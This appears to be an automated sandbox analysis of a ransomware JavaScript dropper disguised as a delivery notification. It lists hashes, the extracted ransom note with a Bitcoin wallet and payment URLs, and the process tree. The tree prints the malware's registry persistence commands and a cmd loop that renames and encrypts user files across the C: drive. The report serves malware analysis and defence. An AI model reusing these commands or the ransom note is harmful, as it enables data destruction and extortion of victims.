Overview

overview

10

Static

static

Delivery_N...doc.js

windows7_x64

10

Delivery_N...doc.js

windows10_x64

10

Resubmissions

17-01-2021 18:02

210117-v36h76g17e 10

15-01-2021 15:50

210115-6zp7zwzspx 10

Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    15-01-2021 15:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Delivery_Notification_00896328.doc.js

  • Size

    248KB

  • MD5

    0168089428c6aa371f4275d0872b0970

  • SHA1

    d2595c0a40c4d8dcf9f7c711f472abc6ac0f592e

  • SHA256

    dc20c80a0c1db5848ceef6714c6d774f3002a0c595638aff0410ae2ddabb710a

  • SHA512

    915d7a3f63429a27dace53418d8b3216ef3b4b6ac82d63ecca6f1590aa7380449fb4fe3ec8eed5a9aa3a8dadeed5ef32091ecdf2e885aca8d998d8150d07f418

Score
10/10
persistenceransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\a.txt

Ransom Note
ATTENTION! All your documents, photos, databases and other important personal files were encrypted using strong RSA-1024 algorithm with a unique key. To restore your files you have to pay 0.54309 BTC (bitcoins). Please follow this manual: 1. Create Bitcoin wallet here: https://blockchain.info/wallet/new 2. Buy 0.54309 BTC with cash, using search here: https://localbitcoins.com/buy_bitcoins 3. Send 0.54309 BTC to this Bitcoin address: 19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ 4. Open one of the following links in your browser to download decryptor: http://ferroli-lietuva.eu/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ http://georgina-collier.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ http://firstshow.info/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ http://gayathri.co.in/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ http://jackroubaud.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ 5. Run decryptor to restore your files. PLEASE REMEMBER: - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES. - Nobody can help you except us. - It`s useless to reinstall Windows, update antivirus software, etc. - Your files can be decrypted only after you make payment. - You can find this manual on your desktop (DECRYPT.txt).
Wallets

19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ

URLs

http://ferroli-lietuva.eu/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ

http://georgina-collier.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ

http://firstshow.info/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ

http://gayathri.co.in/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ

http://jackroubaud.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Modifies registry class 7 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Delivery_Notification_00896328.doc.js
    1⤵
    • Blocklisted process makes network request
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:748
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:540
      • C:\Windows\system32\reg.exe
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
        3⤵
        • Adds Run key to start application
        PID:432
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:328
      • C:\Windows\system32\reg.exe
        REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
        3⤵
        • Modifies registry class
        PID:1228
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1064
      • C:\Windows\system32\reg.exe
        REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
        3⤵
        • Modifies registry class
        PID:1624
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"
      2⤵
        PID:1032
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" k6cdgj99hsftmhewo48hy6twl4xp299iukus)
        2⤵
          PID:684
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"
          2⤵
            PID:576

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Initial Access

        Execution

        Persistence

        Registry Run Keys / Startup Folder

        1
        T1060

        Privilege Escalation

        Defense Evasion

        Modify Registry

        2
        T1112

        Install Root Certificate

        1
        T1130

        Credential Access

        Discovery

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\a.txt
          MD5

          512ad548377714262b373c665f17d1db

          SHA1

          0f05efd559b90eb77418c32fa86cfcba77b6e187

          SHA256

          27966b12ff9831318138b9cf663fd8e25e9469c347fe630a2c6a491bf125e2ca

          SHA512

          f0e7456eccd513a3b09ffe1411ba661716d37efeff6cdd06b00e7859c935655a0eb5e0d75deef9f56985ff360f41e61b8f2eefa819d0677c8aa72cfb2a788943

          Download Submit
        • memory/328-4-0x0000000000000000-mapping.dmp
          Download
        • memory/432-11-0x0000000000000000-mapping.dmp
          Download
        • memory/540-3-0x0000000000000000-mapping.dmp
          Download
        • memory/576-7-0x0000000000000000-mapping.dmp
          Download
        • memory/684-10-0x0000000000000000-mapping.dmp
          Download
        • memory/1032-6-0x0000000000000000-mapping.dmp
          Download
        • memory/1064-5-0x0000000000000000-mapping.dmp
          Download
        • memory/1228-8-0x0000000000000000-mapping.dmp
          Download
        • memory/1436-2-0x000007FEF6350000-0x000007FEF65CA000-memory.dmp
          Filesize

          2.5MB

          Download
        • memory/1624-9-0x0000000000000000-mapping.dmp
          Download